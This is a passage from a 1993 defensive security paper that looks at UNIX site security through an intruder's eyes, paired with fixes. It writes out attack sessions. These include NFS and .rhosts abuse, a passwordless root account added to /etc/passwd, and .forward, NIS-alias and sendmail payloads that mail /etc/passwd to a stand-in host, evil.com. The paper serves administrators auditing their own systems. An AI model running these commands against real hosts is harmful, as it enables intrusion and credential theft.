  2325. This seems to be the popular image of a system cracker.  Young,
  2326. inexperienced, and possessing vast quantities of time to waste, to get
  2327. into just one more system.  However, there is a far more dangerous type
  2328. of system cracker out there.  One who knows the ins and outs of the
  2329. latest security auditing and cracking tools, who can modify them for
  2330. specific attacks, and who can write his/her own programs.  One who not
  2331. only reads about the latest security holes, but also personally
  2332. discovers bugs and vulnerabilities.  A deadly creature that can both
  2333. strike poisonously and hide its tracks without a whisper or hint of a
  2334. trail.  The uebercracker is here.
  2335.  
  2336. -----
  2337.  
  2338. Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
  2339. uebermensch, or, literally translated into English, "over man."
  2340. Nietzsche used the term not to refer to a comic book superman, but
  2341. instead a man who had gone beyond the incompetence, pettiness, and
  2342. weakness of the everyday man.  The uebercracker is therefore the system
  2343. cracker who has gone beyond simple cookbook methods of breaking into
  2344. systems.  An uebercracker is not usually motivated to perform random
  2345. acts of violence.  Targets are not arbitrary -- there is a purpose,
  2346. whether it be personal monetary gain, a hit and run raid for
  2347. information, or a challenge to strike a major or prestigious site or
  2348. net.personality.  An uebercracker is hard to detect, harder to stop, and
  2349. hardest to keep out of your site for good.
  2350.  
  2351. Overview
  2352. --------
  2353.  
  2354. In this paper we will take an unusual approach to system security.
  2355. Instead of merely saying that something is a problem, we will look
  2356. through the eyes of a potential intruder, and show _why_ it is one.  We
  2357. will illustrate that even seemingly harmless network services can become
  2358. valuable tools in the search for weak points of a system, even when
  2359. these services are operating exactly as they are intended to.
  2360.  
  2361. In an effort to shed some light on how more advanced intrusions occur,
  2362. this paper outlines various mechanisms that crackers have actually used
  2363. to obtain access to systems and, in addition, some techniques we either
  2364. suspect intruders of using, or that we have used ourselves in tests or
  2365. in friendly/authorized environments.
  2366.  
  2367. Our motivation for writing this paper is that system administrators are
  2368. often unaware of the dangers presented by anything beyond the most
  2369. trivial attacks.  While it is widely known that the proper level of
  2370. protection depends on what has to be protected, many sites appear to
  2371. lack the resources to assess what level of host and network security is
  2372. adequate.  By showing what intruders can do to gain access to a remote
  2373. site, we are trying to help system administrators to make _informed_
  2374. decisions on how to secure their site -- or not.  We will limit the
  2375. discussion to techniques that can give a remote intruder access to a
  2376. (possibly non-interactive) shell process on a UNIX host.  Once this is
  2377. achieved, the details of obtaining root privilege are beyond the scope
  2378. of this work -- we consider them too site-dependent and, in many cases,
  2379. too trivial to merit much discussion.
  2380.  
  2381. We want to stress that we will not merely run down a list of bugs or
  2382. security holes -- there will always be new ones for a potential attacker
  2383. to exploit.  The purpose of this paper is to try to get the reader to
  2384. look at her or his system in a new way -- one that will hopefully afford
  2385. him or her the opportunity to _understand_ how their system can be
  2386. compromised, and how.
  2387.  
  2388. We would also like to reiterate to the reader that the purpose of this
  2389. paper is to show you how to test the security of your own site, not how
  2390. to break into other people's systems.  The intrusion techniques we
  2391. illustrate here will often leave traces in your system auditing logs --
  2392. it might be constructive to examine them after trying some of these
  2393. attacks out, to see what a real attack might look like.  Certainly other
  2394. sites and system administrators will take a very dim view of your
  2395. activities if you decide to use their hosts for security testing without
  2396. advance authorization; indeed, it is quite possible that legal action
  2397. may be pursued against you if they perceive it as an attack.
  2398.  
  2399. There are four main parts to the paper.  The first part is the
  2400. introduction and overview.  The second part attempts to give the reader
  2401. a feel for what it is like to be an intruder and how to go from knowing
  2402. nothing about a system to compromising its security.  This section goes
  2403. over actual techniques to gain information and entrance and covers basic
  2404. strategies such as exploiting trust and abusing improperly configured
  2405. basic network services (ftp, mail, tftp, etc.)  It also discusses
  2406. slightly more advanced topics, such as NIS and NFS, as well as various
  2407. common bugs and configuration problems that are somewhat more OS or
  2408. system specific.  Defensive strategies against each of the various
  2409. attacks are also covered here.
  2410.  
  2411. The third section deals with trust: how the security of one system
  2412. depends on the integrity of other systems.  Trust is the most complex
  2413. subject in this paper, and for the sake of brevity we will limit the
  2414. discussion to clients in disguise.
  2415.  
  2416. The fourth section covers the basic steps that a system administrator
  2417. may take to protect her or his system.  Most of the methods presented
  2418. here are merely common sense, but they are often ignored in practice --
  2419. one of our goals is to show just how dangerous it can be to ignore basic
  2420. security practices.
  2421.  
  2422. Case studies, pointers to security-related information, and software are
  2423. described in the appendices at the end of the paper.
  2424.  
  2425. While exploring the methods and strategies discussed in this paper we we
  2426. wrote SATAN (Security Analysis Tool for Auditing Networks.)  Written in
  2427. shell, perl, expect and C, it examines a remote host or set of hosts and
  2428. gathers as much information as possible by remotely probing NIS, finger,
  2429. NFS, ftp and tftp, rexd, and other services.  This information includes
  2430. the presence of various network information services as well as
  2431. potential security flaws -- usually in the form of incorrectly setup or
  2432. configured network services, well-known bugs in system or network
  2433. utilities, or poor or ignorant policy decisions.  It then can either
  2434. report on this data or use an expert system to further investigate any
  2435. potential security problems.  While SATAN doesn't use all of the methods
  2436. that we discuss in the paper, it has succeeded with ominous regularity
  2437. in finding serious holes in the security of Internet sites.  It will be
  2438. posted and made available via anonymous ftp when completed; Appendix A
  2439. covers its salient features.
  2440.  
  2441. Note that it isn't possible to cover all possible methods of breaking
  2442. into systems in a single paper.  Indeed, we won't cover two of the most
  2443. effective methods of breaking into hosts: social engineering and
  2444. password cracking.  The latter method is so effective, however, that
  2445. several of the strategies presented here are geared towards acquiring
  2446. password files.  In addition, while windowing systems (X, OpenWindows,
  2447. etc.) can provide a fertile ground for exploitation, we simply don't
  2448. know many methods that are used to break into remote systems.  Many
  2449. system crackers use non-bitmapped terminals which can prevent them from
  2450. using some of the more interesting methods to exploit windowing systems
  2451. effectively (although being able to monitor the victim's keyboard is
  2452. often sufficient to capture passwords).  Finally, while worms, viruses,
  2453. trojan horses, and other malware are very interesting, they are not
  2454. common (on UNIX systems) and probably will use similar techniques to the
  2455. ones we describe in this paper as individual parts to their attack
  2456. strategy.
  2457.  
  2458. Gaining Information
  2459. -------------------
  2460.  
  2461. Let us assume that you are the head system administrator of Victim
  2462. Incorporated's network of UNIX workstations.  In an effort to secure
  2463. your machines, you ask a friendly system administrator from a nearby
  2464. site (evil.com) to give you an account on one of her machines so that
  2465. you can look at your own system's security from the outside.
  2466.  
  2467. What should you do?  First, try to gather information about your
  2468. (target) host.  There is a wealth of network services to look at:
  2469. finger, showmount, and rpcinfo are good starting points.  But don't stop
  2470. there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
  2471. and as many other services as you can find.  There are so many methods
  2472. and techniques that space precludes us from showing all of them, but we
  2473. will try to show a cross-section of the most common and/or dangerous
  2474. strategies that we have seen or have thought of.  Ideally, you would
  2475. gather such information about all hosts on the subnet or area of attack
  2476. -- information is power -- but for now we'll examine only our intended
  2477. target.
  2478.  
  2479. To start out, you look at what the ubiquitous finger command shows you
  2480. (assume it is 6pm, Nov 6, 1993):
  2481.  
  2482.  victim % finger @victim.com
  2483.  [victim.com]
  2484.  Login       Name             TTY Idle     When    Where
  2485.  zen      Dr.  Fubar           co   1d  Wed 08:00   death.com
  2486.  
  2487. Good!  A single idle user -- it is likely that no one will notice if you
  2488. actually manage to break in.
  2489.  
  2490. Now you try more tactics.  As every finger devotee knows, fingering "@",
  2491. "0", and "", as well as common names, such as root, bin, ftp, system,
  2492. guest, demo, manager, etc., can reveal interesting information.  What
  2493. that information is depends on the version of finger that your target is
  2494. running, but the most notable are account names, along with their home
  2495. directories and the host that they last logged in from.
  2496.  
  2497. To add to this information, you can use rusers (in particular with the
  2498. -l flag) to get useful information on logged-in users.
  2499.  
  2500. Trying these commands on victim.com reveals the following information,
  2501. presented in a compressed tabular form to save space:
  2502.  
  2503.  Login   Home-dir    Shell      Last login, from where
  2504.  -----   --------    -----      ----------------------
  2505.  root    /           /bin/sh    Fri Nov 5 07:42 on ttyp1 from big.victim.com
  2506.  bin     /bin                   Never logged in
  2507.  nobody  /                      Tue Jun 15 08:57 on ttyp2 from server.victim.co
  2508.  daemon  /                      Tue Mar 23 12:14 on ttyp0 from big.victim.com
  2509.  sync    /           /bin/sync  Tue Mar 23 12:14 on ttyp0 from big.victim.com
  2510.  zen     /home/zen   /bin/bash  On since Wed Nov  6 on ttyp3 from death.com
  2511.  sam     /home/sam   /bin/csh   Wed Nov  5 05:33 on ttyp3 from evil.com
  2512.  guest   /export/foo /bin/sh    Never logged in
  2513.  ftp     /home/ftp              Never logged in
  2514.  
  2515. Both our experiments with SATAN and watching system crackers at work
  2516. have proved to us that finger is one of the most dangerous services,
  2517. because it is so useful for investigating a potential target.  However,
  2518. much of this information is useful only when used in conjunction with
  2519. other data.
  2520.  
  2521. For instance, running showmount on your target reveals:
  2522.  
  2523.  evil % showmount -e victim.com
  2524.  export list for victim.com:
  2525.  /export                            (everyone)
  2526.  /var                               (everyone)
  2527.  /usr                               easy
  2528.  /export/exec/kvm/sun4c.sunos.4.1.3 easy
  2529.  /export/root/easy                  easy
  2530.  /export/swap/easy                  easy
  2531.  
  2532. Note that /export/foo is exported to the world; also note that this is
  2533. user guest's home directory.  Time for your first break-in!  In this
  2534. case, you'll mount the home directory of user "guest."  Since you don't
  2535. have a corresponding account on the local machine and since root cannot
  2536. modify files on an NFS mounted filesystem, you create a "guest" account
  2537. in your local password file.  As user guest you can put an .rhosts entry
  2538. in the remote guest home directory, which will allow you to login to the
  2539. target machine without having to supply a password.
  2540.  
  2541.  evil # mount victim.com:/export/foo /foo
  2542.  evil # cd /foo
  2543.  evil # ls -lag
  2544.  total 3
  2545.     1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
  2546.     1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
  2547.     1 drwx--x--x  9 10001    daemon       1024 Aug  3 15:49 guest
  2548.  evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
  2549.  evil # ls -lag
  2550.  total 3
  2551.     1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
  2552.     1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
  2553.     1 drwx--x--x  9 guest    daemon       1024 Aug  3 15:49 guest
  2554.  evil # su guest
  2555.  evil % echo victim.com >> guest/.rhosts
  2556.  evil % rlogin victim.com
  2557.      Welcome to victim.com!
  2558.  victim %
  2559.  
  2560. If, instead of home directories, victim.com were exporting filesystems
  2561. with user commands (say, /usr or /usr/local/bin), you could replace a
  2562. command with a trojan horse that executes any command of your choice.
  2563. The next user to execute that command would execute your program.
  2564.  
  2565. We suggest that filesystems be exported:
  2566.  
  2567. o   Read/write only to specific, trusted clients.
  2568. o   Read-only, where possible (data or programs can often be
  2569.     exported in this manner.)
  2570.  
  2571. If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
  2572. various vendor's machines) or has the netgroups bug (CERT advisory
  2573. 91:12), any non-root user with a login name in the target's password
  2574. file can rlogin to the target without a password.  And since the user
  2575. "bin" often owns key files and directories, your next attack is to try
  2576. to log in to the target host and modify the password file to let you
  2577. have root access:
  2578.  
  2579.  evil % whoami
  2580.  bin
  2581.  evil % rsh victim.com csh -i
  2582.  Warning: no access to tty; thus no job control in this shell...
  2583.  victim %  ls -ldg /etc
  2584.  drwxr-sr-x  8 bin      staff        2048 Jul 24 18:02 /etc
  2585.  victim %  cd /etc
  2586.  victim %  mv passwd pw.old
  2587.  victim %  (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
  2588.  victim % ^D
  2589.  evil % rlogin victim.com -l toor
  2590.      Welcome to victim.com!
  2591.  victim #
  2592.  
  2593. A few notes about the method used above; "rsh victim.com csh -i" is used
  2594. to initially get onto the system because it doesn't leave any traces in
  2595. the wtmp or utmp system auditing files, making the rsh invisible for
  2596. finger and who.  The remote shell isn't attached to a pseudo-terminal,
  2597. however, so that screen-oriented programs such as pagers and editors
  2598. will fail -- but it is very handy for brief exploration.
  2599.  
  2600. The COPS security auditing tool (see appendix D) will report key files
  2601. or directories that are writable to accounts other than the
  2602. superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
  2603. file permission problems. On many systems, rsh probes as shown above,
  2604. even when successful, would remain completely unnoticed; the tcp wrapper
  2605. (appendix D), which logs incoming connections, can help to expose such
  2606. activities.
  2607.  
  2608. ----
  2609.  
  2610. What now?  Have you uncovered all the holes on your target system?  Not
  2611. by a long shot.  Going back to the finger results on your target, you
  2612. notice that it has an "ftp" account, which usually means that anonymous
  2613. ftp is enabled.  Anonymous ftp can be an easy way to get access, as it
  2614. is often misconfigured.  For example, the target may have a complete
  2615. copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
  2616. instead of a stripped down version.  In this example, though, you see
  2617. that the latter doesn't seem to be true (how can you tell without
  2618. actually examining the file?)  However, the home directory of ftp on
  2619. victim.com is writable.  This allows you to remotely execute a command
  2620. -- in this case, mailing the password file back to yourself -- by the
  2621. simple method of creating a .forward file that executes a command when
  2622. mail is sent to the ftp account. This is the same mechanism of piping
  2623. mail to a program that the "vacation" program uses to automatically
  2624. reply to mail messages.
  2625.  
  2626.  evil % cat forward_sucker_file
  2627.  "|/bin/mail zen@evil.com < /etc/passwd"
  2628.  
  2629.  evil % ftp victim.com
  2630.  Connected to victim.com
  2631.  220 victim FTP server ready.
  2632.  Name (victim.com:zen): ftp
  2633.  331 Guest login ok, send ident as password.
  2634.  Password:
  2635.  230 Guest login ok, access restrictions apply.
  2636.  ftp> ls -lga
  2637.  200 PORT command successful.
  2638.  150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
  2639.  total 5
  2640.  drwxr-xr-x  4 101      1             512 Jun 20  1991 .
  2641.  drwxr-xr-x  4 101      1             512 Jun 20  1991 ..
  2642.  drwxr-xr-x  2 0        1             512 Jun 20  1991 bin
  2643.  drwxr-xr-x  2 0        1             512 Jun 20  1991 etc
  2644.  drwxr-xr-x  3 101      1             512 Aug 22  1991 pub
  2645.  226 ASCII Transfer complete.
  2646.  242 bytes received in 0.066 seconds (3.6 Kbytes/s)
  2647.  ftp> put forward_sucker_file .forward
  2648.  43 bytes sent in 0.0015 seconds (28 Kbytes/s)
  2649.  ftp> quit
  2650.  evil % echo test | mail ftp@victim.com
  2651.  
  2652. Now you simply wait for the password file to be sent back to you.
  2653.  
  2654. The security auditing tool COPS will check your anonymous ftp setup; see
  2655. the man page for ftpd, the documentation/code for COPS, or CERT advisory
  2656. 93:10 for information on how to set up anonymous ftp correctly.
  2657. Vulnerabilities in ftp are often a matter of incorrect ownership or
  2658. permissions of key files or directories. At the very least, make sure
  2659. that ~ftp and all "system" directories and files below ~ftp are owned by
  2660. root and are not writable by any user.
  2661.  
  2662. While looking at ftp, you can check for an older bug that was once
  2663. widely exploited:
  2664.  
  2665.  % ftp -n
  2666.  ftp> open victim.com
  2667.  Connected to victim.com
  2668.  220 victim.com FTP server ready.
  2669.  ftp> quote user ftp
  2670.  331 Guest login ok, send ident as password.
  2671.  ftp> quote cwd ~root
  2672.  530 Please login with USER and PASS.
  2673.  ftp> quote pass ftp
  2674.  230 Guest login ok, access restrictions apply.
  2675.  ftp> ls -al / (or whatever)
  2676.  
  2677. If this works, you now are logged in as root, and able to modify the
  2678. password file, or whatever you desire.  If your system exhibits this
  2679. bug, you should definitely get an update to your ftpd daemon, either
  2680. from your vendor or (via anon ftp) from ftp.uu.net.
  2681.  
  2682. The wuarchive ftpd, a popular replacement ftp daemon put out by the
  2683. Washington University in Saint Louis, had almost the same problem.  If
  2684. your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
  2685. more recent version.
  2686.  
  2687. Finally, there is a program vaguely similar to ftp -- tftp, or the
  2688. trivial file transfer program.  This daemon doesn't require any password
  2689. for authentication; if a host provides tftp without restricting the
  2690. access (usually via some secure flag set in the inetd.conf file), an
  2691. attacker can read and write files anywhere on the system. In the
  2692. example, you get the remote password file and place it in your local
  2693. /tmp directory:
  2694.  
  2695.  evil % tftp
  2696.  tftp> connect victim.com
  2697.  tftp> get /etc/passwd /tmp/passwd.victim
  2698.  tftp> quit
  2699.  
  2700. For security's sake, tftp should not be run; if tftp is necessary, use
  2701. the secure option/flag to restrict access to a directory that has no
  2702. valuable information, or run it under the control of a chroot wrapper
  2703. program.
  2704.  
  2705. ----
  2706.  
  2707. If none of the previous methods have worked, it is time to go on to more
  2708. drastic measures.  You have a friend in rpcinfo, another very handy
  2709. program, sometimes even more useful than finger.  Many hosts run RPC
  2710. services that can be exploited; rpcinfo can talk to the portmapper and
  2711. show you the way.  It can tell you if the host is running NIS, if it is
  2712. a NIS server or slave, if a diskless workstation is around, if it is
  2713. running NFS, any of the info services (rusersd, rstatd, etc.), or any
  2714. other unusual programs (auditing or security related).  For instance,
  2715. going back to our sample target:
  2716.  
  2717.  evil % rpcinfo -p victim.com    [output trimmed for brevity's sake]
  2718.     program vers proto   port
  2719.      100004    2   tcp    673  ypserv
  2720.      100005    1   udp    721  mountd
  2721.      100003    2   udp   2049  nfs
  2722.      100026    1   udp    733  bootparam
  2723.      100017    1   tcp   1274  rexd
  2724.  
  2725. In this case, you can see several significant facts about our target;
  2726. first of which is that it is an NIS server.  It is perhaps not widely
  2727. known, but once you know the NIS domainname of a server, you can get any
  2728. of its NIS maps by a simple rpc query, even when you are outside the
  2729. subnet served by the NIS server (for example, using the YPX program that
  2730. can be found in the comp.sources.misc archives on ftp.uu.net).  In
  2731. addition, very much like easily guessed passwords, many systems use
  2732. easily guessed NIS domainnames.  Trying to guess the NIS domainname is
  2733. often very fruitful. Good candidates are the fully and partially
  2734. qualified hostname (e.g.  "victim" and "victim.com"), the organization
  2735. name, netgroup names in "showmount" output, and so on.  If you wanted to
  2736. guess that the domainname was "victim", you could type:
  2737.  
  2738.  evil % ypwhich -d victim victim.com
  2739.  Domain victim not bound.
  2740.  
  2741. This was an unsuccessful attempt; if you had guessed correctly it would
  2742. have returned with the host name of victim.com's NIS server.  However,
  2743. note from the NFS section that victim.com is exporting the "/var"
  2744. directory to the world.  All that is needed is to mount this directory
  2745. and look in the "yp" subdirectory -- among other things you will see
  2746. another subdirectory that contains the domainname of the target.
  2747.  
  2748.  evil # mount victim.com:/var /foo
  2749.  evil # cd /foo
  2750.  evil # /bin/ls -alg /foo/yp
  2751.  total 17
  2752.     1 drwxr-sr-x  4 root     staff         512 Jul 12 14:22 .
  2753.     1 drwxr-sr-x 11 root     staff         512 Jun 29 10:54 ..
  2754.    11 -rwxr-xr-x  1 root     staff       10993 Apr 22 11:56 Makefile
  2755.     1 drwxr-sr-x  2 root     staff         512 Apr 22 11:20 binding
  2756.     2 drwxr-sr-x  2 root     staff        1536 Jul 12 14:22 foo_bar
  2757.     [...]
  2758.  
  2759. In this case, "foo_bar" is the NIS domain name.
  2760.  
  2761. In addition, the NIS maps often contain a good list of user/employee
  2762. names as well as internal host lists, not to mention passwords for
  2763. cracking.
  2764.  
  2765. Appendix C details the results of a case study on NIS password files.
  2766.  
  2767. ----
  2768.  
  2769. You note that the rpcinfo output also showed that victim.com runs rexd.
  2770. Like the rsh daemon, rexd processes requests of the form "please execute
  2771. this command as that user". Unlike rshd, however, rexd does not care if
  2772. the client host is in the hosts.equiv or .rhost files. Normally the rexd
  2773. client program is the "on" command, but it only takes a short C program
  2774. to send arbitrary client host and userid information to the rexd server;
  2775. rexd will happily execute the command.  For these reasons, running rexd
  2776. is similar to having no passwords at all: all security is in the client,
  2777. not in the server where it should be. Rexd security can be improved
  2778. somewhat by using secure RPC.
  2779.  
  2780. ----
  2781.  
  2782. While looking at the output from rpcinfo, you observe that victim.com
  2783. also seems to be a server for diskless workstations. This is evidenced
  2784. by the presence of the bootparam service, which provides information to
  2785. the diskless clients for booting.  If you ask nicely, using
  2786. BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
  2787. its NIS domainname.  This can be very useful when combined with the fact
  2788. that you can get arbitrary NIS maps (such as the password file) when you
  2789. know the NIS domainname.  Here is a sample code snippet to do just that
  2790. (bootparam is part of SATAN.)
  2791.  
  2792.     char   *server;
  2793.     struct bp_whoami_arg arg;           /* query */
  2794.     struct bp_whoami_res res;           /* reply */
  2795.  
  2796.     /* initializations omitted... */
  2797.  
  2798.     callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
  2799.             xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
  2800.  
  2801.     printf("%s has nisdomain %s\n", server, res.domain_name);
  2802.  
  2803. The showmount output indicated that "easy" is a diskless client of
  2804. victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
  2805. query:
  2806.  
  2807.  evil % bootparam victim.com easy.victim.com
  2808.  victim.com has nisdomain foo_bar
  2809.  
  2810. ----
  2811.  
  2812. NIS masters control the mail aliases for the NIS domain in question.
  2813. Just like local mail alias files, you can create a mail alias that will
  2814. execute commands when mail is sent to it (a once popular example of this
  2815. is the "decode" alias which uudecodes mail files sent to it.)  For
  2816. instance, here you create an alias "foo", which mails the password file
  2817. back to evil.com by simply mailing any message to it:
  2818.  
  2819.  nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
  2820.  nis-master # cd /var/yp
  2821.  nis-master # make aliases
  2822.  nis-master # echo test | mail -v foo@victim.com
  2823.  
  2824. Hopefully attackers won't have control of your NIS master host, but even
  2825. more hopefully the lesson is clear -- NIS is normally insecure, but if
  2826. an attacker has control of your NIS master, then s/he effectively has
  2827. control of the client hosts (e.g. can execute arbitrary commands).
  2828.  
  2829. There aren't many effective defenses against NIS attacks; it is an
  2830. insecure service that has almost no authentication between clients and
  2831. servers.  To make things worse, it seems fairly clear that arbitrary
  2832. maps can be forced onto even master servers (e.g., it is possible to
  2833. treat an NIS server as a client). This, obviously, would subvert the
  2834. entire schema.  If it is absolutely necessary to use NIS, choosing a
  2835. hard to guess domainname can help slightly, but if you run diskless
  2836. clients that are exposed to potential attackers then it is trivial for
  2837. an attacker to defeat this simple step by using the bootparam trick to
  2838. get the domainname.  If NIS is used to propagate the password maps, then
  2839. shadow passwords do not give additional protection because the shadow
  2840. map is still accessible to any attacker that has root on an attacking
  2841. host.  Better is to use NIS as little as possible, or to at least
  2842. realize that the maps can be subject to perusal by potentially hostile
  2843. forces.
  2844.  
  2845. Secure RPC goes a long way to diminish the threat, but it has its own
  2846. problems, primarily in that it is difficult to administer, but also in
  2847. that the cryptographic methods used within are not very strong.  It has
  2848. been rumored that NIS+, Sun's new network information service, fixes
  2849. some of these problems, but until now it has been limited to running on
  2850. Suns, and thus far has not lived up to the promise of the design.
  2851. Finally, using packet filtering (at the very least port 111) or
  2852. securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
  2853. all can help.
  2854.  
  2855. ----
  2856.  
  2857. The portmapper only knows about RPC services.  Other network services
  2858. can be located with a brute-force method that connects to all network
  2859. ports.  Many network utilities and windowing systems listen to specific
  2860. ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
  2861. usually on port 6000, etc.)  SATAN includes a program that scans the
  2862. ports of a remote hosts and reports on its findings; if you run it
  2863. against our target, you see:
  2864.  
  2865.  evil % tcpmap victim.com
  2866.  Mapping 128.128.128.1
  2867.  port 21: ftp
  2868.  port 23: telnet
  2869.  port 25: smtp
  2870.  port 37: time
  2871.  port 79: finger
  2872.  port 512: exec
  2873.  port 513: login
  2874.  port 514: shell
  2875.  port 515: printer
  2876.  port 6000: (X)
  2877.  
  2878. This suggests that victim.com is running X windows.  If not protected
  2879. properly (via the magic cookie or xhost mechanisms), window displays can
  2880. be captured or watched, user keystrokes may be stolen, programs executed
  2881. remotely, etc.  Also, if the target is running X and accepts a telnet to
  2882. port 6000, that can be used for a denial of service attack, as the
  2883. target's windowing system will often "freeze up" for a short period of
  2884. time.  One method to determine the vulnerability of an X server is to
  2885. connect to it via the XOpenDisplay() function; if the function returns
  2886. NULL then you cannot access the victim's display (opendisplay is part of
  2887. SATAN):
  2888.  
  2889.     char   *hostname;
  2890.  
  2891.     if (XOpenDisplay(hostname) == NULL) {
  2892.        printf("Cannot open display: %s\n", hostname);
  2893.     } else {
  2894.        printf("Can open display: %s\n", hostname);
  2895.     }
  2896.  
  2897.  evil % opendisplay victim.com:0
  2898.  Cannot open display: victim.com:0
  2899.  
  2900. X terminals, though much less powerful than a complete UNIX system, can
  2901. have their own security problems.  Many X terminals permit unrestricted
  2902. rsh access, allowing you to start X client programs in the victim's
  2903. terminal with the output appearing on your own screen:
  2904.  
  2905.  evil % xhost +xvictim.victim.com
  2906.  evil % rsh xvictim.victim.com telnet victim.com -display evil.com
  2907.  
  2908. In any case, give as much thought to your window security as your
  2909. filesystem and network utilities, for it can compromise your system as
  2910. surely as a "+" in your hosts.equiv or a passwordless (root) account.
  2911.  
  2912. ----
  2913.  
  2914. Next, you examine sendmail.  Sendmail is a very complex program that has
  2915. a long history of security problems, including the infamous "wiz"
  2916. command (hopefully long since disabled on all machines).  You can often
  2917. determine the OS, sometimes down to the version number, of the target,
  2918. by looking at the version number returned by sendmail.  This, in turn,
  2919. can give you hints as to how vulnerable it might be to any of the
  2920. numerous bugs.  In addition, you can see if they run the "decode" alias,
  2921. which has its own set of problems:
  2922.  
  2923.  evil % telnet victim.com 25
  2924.  connecting to host victim.com (128.128.128.1.), port 25
  2925.  connection open
  2926.  220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
  2927.  expn decode
  2928.  250 <"|/usr/bin/uudecode">
  2929.  quit
  2930.  
  2931. Running the "decode" alias is a security risk -- it allows potential
  2932. attackers to overwrite any file that is writable by the owner of that
  2933. alias -- often daemon, but potentially any user.  Consider this piece of
  2934. mail -- this will place "evil.com" in user zen's .rhosts file if it is
  2935. writable:
  2936.  
  2937.  evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com
  2938.  
  2939. If no home directories are known or writable, an interesting variation
  2940. of this is to create a bogus /etc/aliases.pag file that contains an
  2941. alias with a command you wish to execute on your target.  This may work
  2942. since on many systems the aliases.pag and aliases.dir files, which
  2943. control the system's mail aliases, are writable to the world.
  2944.  
  2945.  evil % cat decode
  2946.  bin: "| cat /etc/passwd | mail zen@evil.com"
  2947.  evil % newaliases -oQ/tmp -oA`pwd`/decode
  2948.  evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
  2949.  evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
  2950.  
  2951. A lot of things can be found out by just asking sendmail if an address
  2952. is acceptable (vrfy), or what an address expands to (expn).  When the
  2953. finger or rusers services are turned off, vrfy and expn can still be
  2954. used to identify user accounts or targets.  Vrfy and expn can also be
  2955. used to find out if the user is piping mail through any program that
  2956. might be exploited (e.g. vacation, mail sorters, etc.).  It can be a
  2957. good idea to disable the vrfy and expn commands: in most versions, look
  2958. at the source file srvrsmtp.c, and either delete or change the two lines
  2959. in the CmdTab structure that have the strings "vrfy" and "expn".  Sites
  2960. without source can still disable expn and vrfy by just editing the
  2961. sendmail executable with a binary editor and replacing "vrfy" and "expn"
  2962. with blanks.  Acquiring a recent version of sendmail (see Appendix D) is
  2963. also an extremely good idea, since there have probably been more
  2964. security bugs reported in sendmail than in any other UNIX program.
  2965.  
  2966. ----
  2967.  
  2968. As a sendmail-sendoff, there are two fairly well known bugs that should
  2969. be checked into.  The first was definitely fixed in version 5.59 from
  2970. Berkeley; despite the messages below, for versions of sendmail previous
  2971. to 5.59, the "evil.com" gets appended, despite the error messages, along
  2972. with all of the typical mail headers, to the file specified:
  2973.  
  2974.  % cat evil_sendmail
  2975.  telnet victim.com 25 << EOSM
  2976.  rcpt to: /home/zen/.rhosts
  2977.  mail from: zen
  2978.  data
  2979.  random garbage
  2980.  .
  2981.  rcpt to: /home/zen/.rhosts
  2982.  mail from: zen
  2983.  data
  2984.  evil.com
  2985.  .
  2986.  quit
  2987.  EOSM
  2988.  
  2989.  evil % /bin/sh evil_sendmail
  2990.  Trying 128.128.128.1
  2991.  Connected to victim.com
  2992.  Escape character is '^]'.
  2993.  Connection closed by foreign host.
  2994.  
  2995.  evil % rlogin victim.com -l zen
  2996.      Welcome to victim.com!
  2997.  victim %
  2998.  
  2999. The second hole, fixed only recently, permitted anyone to specify
  3000. arbitrary shell commands and/or pathnames for the sender and/or
  3001. destination address.  Attempts to keep details secret were in vain, and
  3002. extensive discussions in mailing lists and usenet news groups led to
  3003. disclosure of how to exploit some versions of the bug.  As with many
  3004. UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
  3005. since they all share a common source code tree ancestry.  Space
  3006. precludes us from discussing it fully, but a typical attack to get the
  3007. password file might look like this:
  3008.  
  3009.  evil % telnet victim.com 25
  3010.  Trying 128.128.128.1...
  3011.  Connected to victim.com
  3012.  Escape character is '^]'.
  3013.  220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
  3014.  mail from: "|/bin/mail zen@evil.com < /etc/passwd"
  3015.  250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
  3016.  rcpt to: nosuchuser
  3017.  550 nosuchuser... User unknown
  3018.  data
  3019.  354 Enter mail, end with "." on a line by itself
  3020.  .
  3021.  250 Mail accepted
  3022.  quit
  3023.  Connection closed by foreign host.
  3024.  evil %
  3025.  
  3026. At the time of writing, version 8.6.4 of sendmail (see Appendix D for
  3027. information on how to get this) is reportedly the only variant of
  3028. sendmail with all of the recent security bugs fixed.
  3029.  
  3030. Trust
  3031. -----
  3032.  
  3033. For our final topic of vulnerability, we'll digress from the practical
  3034. strategy we've followed previously to go a bit more into the theoretical
  3035. side, and briefly discuss the notion of trust.  The issues and
  3036. implications of vulnerabilities here are a bit more subtle and
  3037. far-reaching than what we've covered before; in the context of this
  3038. paper we use the word trust whenever there is a situation when a server
  3039. (note that any host that allows remote access can be called a server)
  3040. can permit a local resource to be used by a client without password
  3041. authentication when password authentication is normally required.  In
  3042. other words, we arbitrarily limit the discussion to clients in disguise.
  3043.  
